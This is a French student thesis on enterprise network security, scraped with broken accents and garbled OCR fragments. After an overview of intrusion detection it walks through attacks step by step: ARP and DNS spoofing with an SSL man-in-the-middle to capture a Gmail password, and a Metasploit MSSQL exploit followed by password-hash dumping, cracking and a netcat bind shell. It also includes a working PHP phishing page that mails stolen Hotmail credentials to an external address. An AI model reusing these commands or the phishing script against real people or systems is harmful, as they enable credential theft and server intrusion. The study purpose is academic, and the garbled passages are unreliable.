Puisquun KIPS analyse les appels systmes, il ralentit lexcution. Cest pourquoi ce sont des solutions
rarement utilises sur des serveurs souvent sollicits.
Exemple de KIPS : SecureIIS, qui est une surcouche du serveur IIS de Microsoft.
4 Les mthodes de dtection
Pour bien grer un systme de dtection dintrusions, il est important de comprendre comment celui-ci
fonctionne. Une question simple se pose alors : comment une intrusion est elle dtecte par un tel systme
? Quel critre diffrencie un flux contenant une attaque dun flux normal ?
Deux techniques sont mises en place dans la dtection dattaques. La premire consiste dtecter des
signatures dattaques connues dans les paquets circulant sur le rseau. La seconde, consiste quant elle,
dtecter une activit suspecte dans le comportement de lutilisateur.
Ces deux techniques, aussi diffrentes soient-elles, peuvent tre combines au sein dun mme systme
afin daccrotre la scurit.
4.1 - Lapproche par scnario (misuse detection)
Cette technique sappuie sur la connaissance des techniques utilises par les attaquants pour dduire
des scnarios typiques. Elle ne tient pas compte des actions passes de lutilisateur et utilise des signatures
dattaques (ensemble de caractristiques permettant didentifier une activit intrusive : une chane
alphanumrique, une taille de paquet inhabituelle, une trame formate de manire suspecte, ).
Recherche de motifs (pattern matching) :
La mthode la plus connue et la plus facile comprendre. Elle se base sur la recherche de motifs
(chanes de caractres ou suite doctets) au sein du flux de donnes. LIDS comporte une base de
signatures o chaque signature contient le protocole et port utiliss par lattaque ainsi que le motif qui
permettra de reconnatre les paquets suspects.
Le principal inconvnient de cette mthode est que seules les attaques reconnues par les signatures seront
dtectes. Il est donc ncessaire de mettre jour rgulirement la base de signatures.
Un autre inconvnient est que les motifs sont en gnral fixes. Or une attaque nest pas toujours identique
100%. Le moindre octet diffrent par rapport la signature provoquera la non dtection de lattaque.
Pour les IDS utilisant cette mthode, il est ncessaire dadapter la base de signatures en fonction du
systme protger. Cela permet non seulement de diminuer les ressources ncessaires et donc augmenter
les performances ; mais galement rduire considrablement le nombre de fausses alertes et donc faciliter
le travail des administrateurs rseaux qui analyseront les fichiers dalertes.
Cette technique est galement utilise dans les anti-virus.
Recherche de motifs dynamiques :
Le principe de cette mthode est le mme que prcdemment mais les signatures des attaques voluent
dynamiquement. LIDS est de ce fait dot de fonctionnalits dadaptation et dapprentissage.
Analyse de protocoles :
Cette mthode se base sur une vrification de la conformit (par rapport aux RFC) des flux, ainsi que sur
lobservation des champs et paramtres suspects dans les paquets. Cependant, les diteurs de logiciels et
les constructeurs respectent rarement la lettre les RFC et cette mthode nest pas toujours trs
performante.
_z
Lanalyse protocolaire est souvent implmente par un ensemble de prprocesseurs, o chaque
prprocesseur est charg danalyser un protocole particulier (FTP, HTTP, ICMP, ...). Du fait de la
prsence de tous ces prprocesseurs, les performances dans un tel systme sen voient fortement
dgrades.
Lintrt fort de lanalyse protocolaire est quelle permet de dtecter des attaques inconnues,
contrairement au pattern matching qui doit connatre lattaque pour pouvoir la dtecter.
Analyse heuristique et dtection danomalies :
Le but de cette mthode est, par une analyse intelligente, de dtecter une activit suspecte ou toute autre
anomalie.
Par exemple : une analyse heuristique permet de gnrer une alarme quand le nombre de sessions
destination dun port donn dpasse un seuil dans un intervalle de temps prdfini.
4.2 - Lapproche comportementale (Anomaly Detection) :
Cette technique consiste dtecter une intrusion en fonction du comportement pass de
lutilisateur. Pour cela, il faut pralablement dresser un profil utilisateur partir de ses habitudes et
dclencher une alerte lorsque des vnements hors profil se produisent.
Cette technique peut tre applique non seulement des utilisateurs mais aussi des applications et
services. Plusieurs mtriques sont possibles : la charge CPU, le volume de donnes changes, le temps de
connexion sur des ressources, la rpartition statistique des protocoles et applications utiliss, les heures de
connexion,
Cependant elle possde quelques inconvnients :
Peu fiable : tout changement dans les habitudes de lutilisateur provoque une alerte.
Ncessite une priode de non fonctionnement pour mettre en uvre les mcanismes dauto-
apprentissage : si un pirate attaque pendant ce moment, ses actions seront assimiles un profil
utilisateur, et donc passeront inaperues lorsque le systme de dtection sera compltement mis en
place.
Ltablissement du profil doit tre souple afin quil ny ait pas trop de fausses alertes : le pirate
peut discrtement intervenir pour modifier le profil de lutilisateur afin dobtenir aprs plusieurs
jours ou semaines, un profil qui lui permettra de mettre en place son attaque sans quelle ne soit
dtecte.
Plusieurs approches peuvent tre utilises pour la mthode de dtection comportementale :
Approche probabiliste :
Des probabilits sont tablies permettant de reprsenter une utilisation courante dune application ou dun
protocole. Toute activit ne respectant pas le modle probabiliste provoquera la gnration dune alerte.
Exemple : Avec le protocole HTTP, il y a une probabilit de 0.9 quune commande GET soit faite aprs
une connexion sur le port 80. Il y a ensuite une probabilit de 0.8 que la rponse cette commande GET
soit HTTP/1.1 200 OK .
Approche statistique :
Le but est de quantifier les paramtres lis lutilisateur : taux doccupation de la mmoire, utilisation des
processeurs, valeur de la charge rseau, nombre daccs lIntranet par jour, vitesse de frappe au clavier,
sites les plus visits,
Cette mthode est trs difficile mettre en place. Elle nest actuellement prsente que dans le domaine de
la recherche, o les chercheurs utilisent des rseaux neuronaux et le data mining pour tenter davoir des
rsultats convaincants.
__
Conclusion :
Depuis certains nombre dannes, les menaces et les vulnrabilits se sont diversifies ne sarrtant
plus aux grandes organisations. Les petites et les moyennes entreprises et lutilisateur domicile sont
dsormais au milieu du critique. Il est donc important pour chacun dapprendre un minimum pour sa
propre scurit pour la scurit de son entreprise.
Chapitre : 3 Exprimentations
_
Chupltre3 .
Exprimentations
Introduction :
Pour un responsable de la scurit, tester son rseau, tester les vulnrabilits, tester les mots de passe
est un travail quotidien, pour lui il performe ces capacits et connaissance dans ce domaine, et protge
son rseau.
Cest pour a on fait cest exprimentations pour mieux comprendre, car cest pas lexprience quon
apprend plus.
Exprimentation 1 :
A la recherche du mot de passe dune boite e-mail :
Par fois un attaquant cherche tirer des informations confidentielles se trouvant dans la boite e-
mail dun grant dune entreprise par exemple, une fois quil ait accs au rseau local, il mis en uvre
une technique pour obtenir le mot de passe de cette boite, dite Man In The Middle.
La boite de notre victime fait partie du domaine de @gmail.com, gmail utilise le standard SSL pour
scuriser ses transactions.
SSL :(Secure Sockets Layers, que l'on pourrait traduire par couche de sockets scurise) est un
procd de scurisation des transactions effectues via Internet. Le standard SSL a t mis au point par
Netscape, en collaboration avec Mastercard, Bank of America, MCI et Silicon Graphics. Il repose sur
un procd de cryptographie par clef publique afin de garantir la scurit de la transmission de donnes
sur internet. Son principe consiste tablir un canal de communication scuris (chiffr) entre deux
machines (un client et un serveur) aprs une tape d'authentification.
Le systme SSL est indpendant du protocole utilis, ce qui signifie qu'il peut aussi bien
scuriser des transactions faites sur le Web par le protocole HTTP que des connexions via le protocole
FTP. En effet, SSL agit telle une couche supplmentaire, permettant d'assurer la scurit des donnes,
situe entre la couche application et la couche transport (protocole TCP par exemple). De cette
manire, SSL est transparent pour l'utilisateur, il n'a pas faire des modifications pour scuriser ses
donnes.
Afin dobtenir le rsultat recherch on utilise plusieurs outils.
On travaille sous linux WHAX 3.0 :
Tout dabord on lance une premire console Shell et on utilise un programme fragrouter B1.
Fragrouter est un programme ddi pour le routage du trafic du rseau, il est utilis dans les attaques
fragmentation de paquets.
Sa syntaxe principale est de la forme :
fragrouter [ -i interface ] [ -p ] [ -g hop ] [ -G hopcount ] ATTACK.
i: Linterface utiliser pour la capture des paquets.
P: pour prserver entirement lentte du protocole dans le premier paquet.
ATTAQUE dans notre cas B1 qui veut dire baseline-1 ce qui signifie IP forwarding normal. En
dautre termes renvoyer les paquets dans leur forme originale.
_
Par la suite on verra quon va diriger le trafic de la victime vers notre machine, qui va falloir rediriger
vers sa vraie destination, on gnral la passerelle, pour cela soit on active lIP forwarding dans le
noyau, soit on utilise fragrouter B1.
On lance une deuxime console Shell, on utilise le programme arpspoof afin de raliser Man In The
Middle.
Arpspoof est un programme qui change le cache de la cible en remplaant ladresse MAC de la
passerelle par celle de lattaquant.
Aprs avoir lanc la requte arpspoof -t 192.168.100.68 192.168.100.1,
Ladresse cible est 192.168.100.68
Et ladresse de la passerelle de la cible est 192.168.100.1
On aura plusieurs messages de type rponse arp.
On lance une troisime console Shell, on utilise le programme dnsspoof.
Dnsspoof est un outil qui permet de donner des rponses DNS la victime avant mme que le vrai
DNS du rseau puisse rpondre.
Ensuite on lance une quatrime console pour excuter webmitm qui est un proxy web qui accepte la
connexion de la victime et qui lui simule un certificat suite sa demande en mode SSL.
Avant lexcution de ces outils on peut vrifier sur lcran de la victime que cest bien le vrai DNS qui
rpond au requtes de la machine en utilisant le programme nslookup, en suite en fait rentrer le
domaine gmail.com et on obtient la vraie adresse IP du gmail.com.
_6
Et on peut voir le dns spoof sur lcran de la victime aprs lexcution de lattaque.
Une fois que tous ces outils sont lancs on ouvre ethereal :
Ethereal ou actuellement wireshark, est un analyseur de rseau trs rpondu dans le monde de Linux,
et fonctionne galement sous Windows, il est trs complet avec une interface graphique, il permet de
dcortiquer de nombreux protocoles
Dans la fentre de capture, il y a trois options plus tous les filtres que l'on peut ajouter :
Le champ File permet de spcifier un fichier dans lequel vont tre enregistrs les paquets capts. On
pourra alors ouvrir la capture ralise plus tard avec wireshark.
_;
Update list of packets in real time permet (s'il est coch) de voir les paquets s'afficher en temps rel
(pendant la capture) dans la fentre des paquets disponibles. Cette option ne doit tre utilise que s'il
n'y a pas trop de paquets conservs.
Automatic scrolling in live capture permet (accessible seulement si l'option prcdente est coche)
de voir les derniers paquets s'afficher en temps rel (pendant la capture) dans la fentre des paquets
disponibles en faisant dfiler la liste des paquets disponibles.
Enable name resolution permet (s'il est coch) de demander une traduction des adresses IP en noms.
Cette option doit aussi tre manipule avec prcaution car elle gnre des requtes DNS qui peuvent
encombrer le rseau et prendre du temps, surtout s'il y a beaucoup de machines diffrentes dans les
paquets et qu'elles ne sont pas connues dans les DNS.
On laisse ethereal tourner jusqu' ce que la victime se connecte gmail.com, et valide son mot de
passe, on stoppe la capture, et on ouvre une autre console Shell, on tape les deux lignes suivantes :
ssldump r test k webmitm.crt d > out
Cat out | grep Email
Alors on aura
Login : adda passwd : djebari
_8
Exprimentation 2:
Hack complet dun serveur :
Dans cette exprience on va essayer de faire un hack complet
5
c'est--dire pntrer une victime et avoir
les privilges administrateur.
6
Pour cela on scanne dabord notre cible, on utilise le logiciel nmap.
Nmap est un scanner de ports open source cr par Fyodor et distribu par Insecure.Org. Il est conu
pour dtecter les ports ouverts, et dcouvrir les types dOS et de services utiliss dans chaque port.
avec les commandes :
nmap sT O [adresse IP de la cible]
nmap sV [adresse IP de la cible] P 23,25,80
et :
nmap sU [adresse IP de la cible]
Et on aura comme rsultat les ports TCP et UDP ouvert, le service utilis pour chaque port, ainsi la
version du systme dexploitation.
On lance ensuite le logiciel metasploit,
Cn a reallse l'experlmenLaLlon d'un posLe a l'exLerleure de l'lnsLlLuL a cause de noLre passerelle qul dellmlLe le Lravall
6
Cn a masque la parLle reseau de l'adresse l pour des ralsons des securlLes car c'esL un serveur d'un hebergeur de slLe
_
Le framework Metasploit est une plate-forme de tests d'intrusion embarquant des fonctionnalits
d'automatisation d'exploitation de failles et de cration d'exploits.
Outil de prdilection pour nombre d'experts en scurit, chercheurs, mais aussi d'administrateurs
rseau, Metasploit intgre une base d'exploits (plus d'une centaine), c'est--dire de codes usant de
vulnrabilits, pour excuter arbitrairement une commande sur une machine.
On a repr le port quon peut exploiter, cest le port de ngociation UDP 1434 dans les serveurs 2000
MySQL et plus, alors on utilise metasploit avec lutilisation de lexploit mssql2000_resolution, avec
le payload (ce qu'on appelle la charge un code ) win32_bind_meterpreter.
Apres on prcise ladresse IP de la cible avec la commande
RHOST [adresse_IP]
ensuite on excute la commande
EXPLOIT
Pour lancer lexploit (le code), on aura une connexion directe avec la cible sur le port 4444.
o
Cet exploit dmarre un fichier DLL qui nous permettra de lancer des excutables de la machine cible,
dans notre cas linvit de commande CMD, et l on a la main dans linvite de commande de la
machine cible.
En tapant la commande :
ipconfig
Pour prouver quon excute ces commandes dans la machine cible
hostname
Donnera alors le non de la machine
Whoami
Renvoie le nom de domaine, le nom d'ordinateur, le nom d'utilisateur, les noms de groupes,
l'identificateur d'ouverture de session et les privilges de l'utilisateur actuellement connect.
Alors on essaye maintenant davoir le privilge administrateur, alors on essaye de trouver le mot de
passe administrateur
On lance le programme TFTPD dans un deuxime Shell (dans notre pc), la destination par dfaut des
objets envoys par tftp est /tmp.
alors on dplace les outils ncessaire pour le dcryptage de mot de passe dans ce rpertoire /tmp, les
outils sont (nc.exe netcat : un clbre utilitaire en ligne de commande, qui permet de faire peu prs
tout ce que vous voulez avec des sockets , PWDump4.exe, PWDump4.dll les deux sont utiliss
pour rcuprer le hash du mots de passe et wordlist.txt.gz aprs la dcompression wordlist.txt est
un dictionnaire utiliser dans le dcryptage des mots de passes )
z
Revenant linvit de commande dans le pc cible et lanant le tftp pour envoyer les outils (nc.exe,
PWDump4.exe et PWDump4.dll)
On lance PWDump.exe dans le pc cible en tapant la commande :
pwdump4 /l /o :pwqump4.txt
les options /l : pour excuter pwdump4 dans le mme pc et /o pour envoyer le rsultat dans le fichier
spcifi pwdump4.txt.
on envoie maintenant le fichier pwdump4.txt dans notre pc par tftp
on essaie de dcrypter le hash
john w :wordlist.txt pwdump4.txt
a donne le mot de passe pour ladministrateur PASSWORD
_
revenant maintenant linvit de commande dans le pc cible, on lance nc.exe :
nc L p 10000 e cmd.exe
le "-L" majuscule annonce NetCat qu'il doit attendre des connections en permanence mode listen
(on attend une connexion, ici sur un port)
-p 10000 pour dire que le port sur lequel on attend la connexion est le port 10000
NetCat permet aussi de rediriger les entres et sorties d'un programme vers un socket par loption e,
ici cest linvit de commande cmd
Maintenant on peut sortir du shell qui excute linvit de commande dans le pc cible.
Revenant dans le Shell de notre pc et excutant Telnet :
telnet <adresse_ip_cible> 10000
on est maintenant dans la machine cible, vrifiant par ipconfig pour ladresse ip, et vrifiant les
privilges par whoami ,toujours on a pas acce administrateur
essayant par le port par defaut de telnet 23
telnet <adresse_ip_cible>
demande le login : ADMINISTRATOR

password : PASSWORD
et puis cest ok !!!
accs distance un serveur avec un privilge administrateur.
Conclusion :
Un pirate infiltr au sein dun ordinateur peut ouvrir, modifier ou dtruire des fichiers sensibles et
paramtrer le systme pour y revenir facilement.
On a appris beaucoup de chose sur les systmes dexploitation (surtout LINUX), les failles, les
rseaux en ralisant ces expriences, un vrai pirate (hacker) doit avoir de vastes connaissances sur
les rseaux dordinateurs, dpassant celles de leurs fabricants, et un bon administrateur rseaux doit
tre plus intelligeant quun pirate.
Chapitre : 4 Applications
Chupltre4 .
Applications
Application 1 : social engineering
Elle consiste mettre en uvre une technique du social engineering, dite le fishing.
Dfinition :
En informatique, le fishing, parfois appel hameonnage, est un terme dsignant l'obtention
d'informations confidentielles (comme les mots de passe ou d'autres informations prives), en se
faisant passer auprs des victimes pour quelqu'un digne de confiance ayant un besoin lgitime de
l'information demande. C'est une forme d'attaque informatique de type ingnierie sociale.
Mise en uvre :
Cette application se base sr la cration des formulaires interactifs permettent aux auteurs de
pages Web de doter leur page web d'lments interactifs permettant par exemple un dialogue avec les
internautes, Le lecteur saisit des informations en remplissant des champs ou en cliquant sur des
boutons, puis appuie sur un bouton de soumission (submit) pour l'envoyer soit un URL, c'est--dire
de faon gnrale une adresse e-mail ou un script de page web dynamique tel que PHP.
Dans notre cas on utilise la page hotmail.php pour tromper notre victime, en la mettant dans le site
http://astuceskiki.com, et la page sera http://astuceskiki.com/msn/?merwane, cette page sera prcde
par un message dalerte qui indiquera que les informations seront enregistres pour ne pas tromper
dautres utilisateurs car tout cela est titre acadmique.
Pour commencer on cre notre page en PHP et en HTML, ensuite on utilise la mthode POST pour
rcuprer les variables stockes dans le formulaire en PHP, donc si le champ de saisie de texte
s'appelle 'test', on rcupre le contenu dans la variable $_POST['test']. Aprs on envoie ces donnes par
mail.
Le script qui renvoi les donnes par e-mail:
<?php
$titre = "Mot de pass msn";
$message='L"adresse et '.$_POST['login'].' Et le pass et '.$_POST['passwd'].' @++' ;
mail("merwanne@gmail.com",$titre,$message);
?
Donc ici la victime remplit son adresse et son mot de passe en croyant que cest bien la page
hotmail.com, et toutes ces informations seront envoyes notre e-mail, et en mme temps il sera
redirig la vraie page www.hotmail.com pour quil aura moins de soupons, et ceci par le script java
de redirection.
<script language="javascript"
type="text/javascript">

</script>
6
Application 2 : Scanner de ports.
Cest un script PHP qui utilise la mthode raw socket pour tenter douvrir une connexion du port
choisis avec lhte voulu.
DIinitinn d'unc 5nckct :
La notion de Socket a t introduite dans les distributions de Unix BSD de Berkeley (un systme de
type UNIX), pour cette raison, on parle de Sockets BSD (Berkeley Software Distribution).
Il s'agit d'un modle permettant la communication inter processus (IPC - Inter Process
Communication) afin de permettre divers processus de communiquer aussi bien sur une mme
machine qu' travers un rseau TCP/IP.
Chaque entit (i.e : processus) implique dans une communication doit disposer dun point de contact :
il peut sagir dune bote aux lettres
ou dun poste tlphonique.
Une Socket nest rien dautre, dans le systme, que lquivalent de lun des ces objets. Il sagit dun
point de communication bidirectionnel par lequel un processus pourra mettre ou recevoir des
informations.
Lanalogie entre les Sockets, le courrier et le tlphone est trs vrai. Cest deux formes de
communication vont infrer sur le type de Socket choisir :
tlphone : ncessite une connexion, linformation correspond un message non-structur (une
suite continue de bits ...)
courrier : ne ncessite pas de connexion, linformation correspond un message structur (un
entte, ...)
Les processus communiquent en utilisant le modle client-serveur, chacun des deux
processus pouvant tre, tour tour, client et serveur.
Linterface client/serveur (Socket) utilise lorigine dans le monde UNIX et TCP/IP,
puistendue aujourdhui Microsoft ( Winsock ) .
Les applications cliente et serveur ne voient les couches de communication qu travers
lAPI Socket (abstraction):
Chaque Socket a une adresse unique compose de deux lments :
une adresse IP
un numro de port.
Socket = adresse IP + n de port.
Socket A.P.I.(application programming interface) :Ensemble de fonctions permettant la
communication en utilisant les protocoles TCP/IP ou UDP/IP
serveur cllenL
porL zoo
canal de communlcaLlon
l=z.68.oo.68
l=z.68.oo.
commun|cat|on c||ent]serveur
;
La fonction principale utilise dans notre script est la fonction fsockopen qui ouvre une socket de
connexion.
$fp = @fsockopen($_GET['IP'], $_GET['PORT'], $errno, $errstr,5);
On a deux champs de variables:
Un pour saisir ladresse IP du poste distant.
Et la deuxime pour le numro de port ouvrir.
Le script PHP est:
<?php
if (isset($_GET['IP']) AND isset($_GET['PORT']))
{ $fp = @fsockopen($_GET['IP'], $_GET['PORT'], $errno, $errstr,5);
if (!$fp) {echo'Connexion refuse';}
else {echo 'Connexion russie !</b> Le port '.$_GET['PORT'].' est ouvert';
fclose($fp);}
}
else {
?>
<FORM METHOD="GET" ACTION="">
Adresse IP : <INPUT type="text" name="IP" size="15" value="<?php echo
$_SERVER['REMOTE_ADDR']; ?> ">
PORT: <INPUT type="text" size="4" name="PORT" value="139">
<INPUT type="submit" value="Test !">
</FORM>
<?php
8
Application 3 : ralisation dun analyseur sous DELFI :
Pour lexcution du sniffer il faudra installer Winpcap, et PacketX, qui seront dans le CD joint avec le
mmoire.
PacketX est un ensemble de fonctions sous forme ACX (ActiveX),
ActiveX Intranet NEWT de NetManage est un ensemble de composants et de mcanismes bass sur la
technologie ActiveX (appel prcdemment contrle OLE personnalis) qui facilite la programmation,
les catgories de contrle :
Contrles WinSock de base
Contrle TCP/UDP
Contrles client
Contrles WEB
Contrles d'infrastructure
Serveur
ActiveX Intranet NEWT fonctionne avec Visual Basic 4.0, Delphi et tout autre environnement de
dveloppement qui prend en charge les contrles ActiveX .
Lensemble PacketX contrle la librairie de capture de Winpcap.
On a utilis trois fonctions principales dans cet analyseur :
Interface du sniffer IGE27
La premire : nous permet davoir la liste des interfaces rseau installes sur notre poste, et elle nous
offre les dtails concernant ces interfaces :
Adresse IP de linterface.
Le masque sous rseau.
Et ladresse MAC de la carte.
Elle sexcute en appuyant sr la touche detection. Et les rsultats saffichent dans les deux champs en
parallles..
La deuxime : permet dutiliser la capture en utilisant une interface slectionne en appuyant sr le
bouton star, et on arte en appuyant sr le bouton stop
Laffichage se fait dans les deux crans de capture,
le premier sert affich les donnes aprs analyse : la taille, lIP source, lIP destination, le port
source, le port destination, et le protocole utilis.
Le deuxime sert afficher les paquets capturs en leur tat brute, en mode hexadcimal.
La troisime : est une fonction de filtrage de paquet selon le protocole disr, tcp ou udp.
IGE : 27 Scurit des rseaux dentreprises
o
Conclusion gnrale
La forte mdiatisation des cas de diffusion de logiciels malveillants sur Internet a considrablement
augment la notorit des menaces externes qui psent sur les ressources rseau des organisations.
Toutefois, c'est du rseau interne que proviennent certaines des attaques les plus dangereuses contre
l'infrastructure d'une organisation. Les attaques internes susceptibles de causer le plus de dgts sont
celles qui rsultent des activits des personnes de confiance maximale, comme les administrateurs
rseau. L'analyse des menaces aussi bien internes qu'externes a conduit de nombreuses organisations
s'intresser des systmes qui surveillent les rseaux et dtectent les attaques.
Pour les organisations dont les activits sont fortement rglementes, la surveillance de la scurit est
une exigence oprationnelle. Tandis que de nombreuses institutions dans le monde ne cessent de
renforcer leurs exigences, les organisations sont contraintes de surveiller leurs rseaux, de contrler les
demandes d'accs aux ressources et d'identifier les utilisateurs qui ouvrent et ferment des sessions
rseau. Une rglementation peut galement obliger une socit archiver ses donnes de scurit
pendant un certain temps.
Comme il ny a pas et il ny aura sans doute jamais de rseaux srs, nous pouvons quand mme nous
protger dune majorit de problmes associs lInternet en tant vigilant. Toutefois, lInternet
continue de grandir en popularit et les statistiques de fraudes et dattaques risquent de continuer
augmenter si les utilisateurs ne prennent pas conscience que la scurit est un enjeu capital pour
lInternet.
Pour cela nous avons essay de comprendre, et grce ce projet, nous avons beaucoup appris sur la
scurit des rseaux informatiques.
Comprendre les rseaux est trs important et la connaissance profonde des systmes dexploitation
nous permet de mieux contrler les problmes lis la scurit des rseaux.
Pour ce modeste travail concernent les applications, un suivi dans ce sens sera judicieux et plus
particulirement concernant lanalyse des paquets et le scan de ports pour un futur logiciel de
surveillance de rseaux de notre institut et pour des tests de vulnrabilit.
On a insist dans ce mmoire ddier tout un chapitre pour lexprimentation l o on a appris
beaucoup de choses suite aux divers problmes rencontrs.
GLOSSAIRE :
ARP Address Resolution Protocol : protocole utilis dans les rseaux Ethernet pour la rsolution
dadresses IP en une adresse MAC.
AP Access Point : lments rseau permettant la connexion au rseau de lentreprise par une
technologie sans fil (Wireless).
ASCII
American Standard Code for Information Interchange : la table ASCII est une correspondance
entre des valeurs numriques et des caractres.
Backdoor
Porte drobe : lorsquune intrusion est russie, le hacker peut laisser un backdoor, ce qui
correspond une porte cache faite gnralement par un troyen, par un port ouvert, par un
compte FTP ou encore par une modification du firewall.
CAM
Content Adresable Memory : table se trouvant dans les switchs pour permettre dassocier
ladresse MAC dun systme au port du switch (table dynamique).
DoS
Denial of Service: dni de service est un type dattaque rseau servant rendre indisponible
une machine ou un service sur une machine.
HTML
Hyper Text Markup Language : langage balises employ pour faire des pages Internet.
HTTP
HyperText Transfert Protocol : protocole utilis par les navigateurs pour consulter les pages
Internet situes sur des serveurs HTTP.
HTTPS
Protocole http scuris par le protocole SSL.
IOS Internetwork Operating System : nom donn au software des diffrents lments Cisco.
ICMP Internet Control Message Protocol : protocole de contrle de messages Internet qui est utilis
par les routeurs pour gnrer des erreurs et par le programme ping.
ISN Initial Sequence Number : lors de louverture dune connexion TCP, le client et le serveur
doivent insrer leur ISN.
LAN Local Area Network : rseau local de lentreprise
.
LIFO Last In First Out : mthode de rcupration des informations dans une pile. La dernire
information introduite est la premire en tre extraite.
z
MIB Management Information Base : table contenant des informations rseau se trouvant dans les
lments rseau.
NAT Network Address Translation: traduction dadresses rseau effectue gnralement par les
firewalls, traduction faite entre un rseau dadresses IP priv et un rseau dadresses IP public.
OS Operating System: systme dexploitation tels que Windows, UNIX ou MAC
OSI Modle dvelopp par lISO (International Organization of Standards) afin que soit dfini un
standard utilis dans le dveloppement de systmes ouverts. Modle sept couches : 1
physique, 2 liaison, 3 rseau, 4 transport, 5 session, 6 prsentation, 7 application.
SMTP
Simple Mail Transfert Protocol : protocole utilis pour le transfert de courrier sur Internet.
SNMP
Simple Network Management Protocol : protocole employ pour la gestion rseau, notamment
pour consulter les MIBs.
SSL Secure Sockets Layers : protocole servant scuriser les applications. Il se situe au-dessus de la
couche TCP.
SSH Secure Shell : correspond un Telnet avec la couche SSL.
TCP Transmission Control Protocol : protocole de transport (couche 4 du modle OSI) orient
connection qui garantit la fiabilit.
UDP
User Datagram Protocol : protocole de transport (couche 4 du modle OSI) ne garantissant pas
la fiabilit linverse de TCP.
WEP
Wired Equivalent Privacy: protocole scuris employ dans les rseaux WLAN par la norme
802.11b.
WLAN
Wireless Local Area Network : rseau LAN sans fils.
IGE 27 Scurit des rseaux dentreprises
Bibliographie :
Scurit informatique risques, stratgies et solutions Didier GODART Editions des CCI -
Edition 2005.
Scurit des systmes dinformation et des rseaux Raymond Panko PEARSON Education
Edition 2004
Guide de la scurit des systmes dinformation - Robert Longeon CNRS Edition 1999
802.11 Les Rseaux sans fils - Julien Arbey Edition 2003
Les rseaux - Guy Pujolle Edition EYROLLES Edition 2005
Programmation en C++ -JOHN R. HUBBARD Schaums Edition 2002
Systme de Dtection dIntrusions SNORT - Sbastien DURAND - Edition 2002/2003
Le Social Engineering - Cdric de Clarens et Sbastien Hurlin Edition 2003
Scurit des rseaux locaux Ethernet - Cdric Blancher Edition 2003
La Scurit Rseau Avec Ipsec - Ghislaine LABOURET Edition 1999
Les Reseaux Informatiques D'entreprise - Pierre Erny, 1998
Projet Scurit Rseaux - Ferro Luca & Salman Nader 2006
Scuriser les rseaux par la connaissance des usages - Franois Dagorn - Edition 2007
Handbook of Information Security Management - Hal Tipton and Micki Krause - Consulting Editors
Edition 1998
Maximum Security - Anonymous - Fourth Edition2003
Beginning Unix - Paul Love, Joe Merlino, Craig Zimmerman, Jeremy C. Reed, and Paul Weinstein
Edition 2005
Hacking: The Art of Exploitation - Jon Erickson - Edition 2003
Linux and Unix Security Portable Reference - NITESH DHANJANI Edition 2003
Building Internet Firewalls - D. Brent Chapman & Elizabeth D. Zwicky - 1995
Webographie :
www.google.com
http://support.gateway.com/support/supinfo/index.asp?pg=2&file=mo_solo.html
http://coding.romainl.com/
http://www.lacapotedudisquedur.be/Ping_flooding.html
http://hacknews.ifrance.com/
http://www.frameip.com/masques_de_sous_reseau/
http://www.securitybugware.org/works.html
http://hakin9.org/en/haking.html
http://www.remote-exploit.org/
http://www.transfer-tic.org/
http://www.supinfo-projects.com/fr/
http://www.securityfocus.com

Sécurité Des Réseaux D'entreprises

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Sécurité Des Réseaux D'entreprises

Uploaded by

Copyright:

Available Formats

ADDA Mohamed

/ ov. c. ncnc. vc v {vnic I]cvi qvc ]vinc cvv.ov c v qvi ]vvc..c

5 - RSEAU SANS FIL.....................................................................................................................................z

Lintgrit des donnes (MAC, Message AuthentiCation)

ueLall dans reference [8L]

Le deLall esL dans le chaplLre z

demande le login : ADMINISTRATOR

You might also like